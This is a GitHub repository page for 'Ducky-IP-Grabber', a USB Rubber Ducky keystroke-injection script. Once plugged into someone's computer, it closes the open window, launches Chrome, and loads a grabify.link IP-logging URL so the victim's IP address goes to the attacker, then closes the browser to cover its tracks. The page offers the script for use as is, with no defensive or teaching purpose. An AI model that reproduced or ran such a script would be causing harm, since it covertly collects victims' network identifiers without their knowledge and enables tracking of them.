Skip to content

AstroBolo/Ducky-IP-Grabber

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 

Repository files navigation

Ducky-IP-Grabber

USB rubber ducky script to pull IPs

Pull IPs with this simple Ducky script

REM Author: Cyber Coding
REM Ducky for getting IPs
REM Only works if the user has chrome
Delay 5000
REM ----------- opens chrome web browser
ALT f4
Delay 3000
GUI r
DELAY 500
STRING chrome
DELAY 600
ENTER
DELAY 3000
REM ----------- gets IPS
STRING https://grabify.link/3K27ZM
DELAY 3000
ENTER
DELAY 2000
ALT f4

Releases

No releases published

Packages

No packages published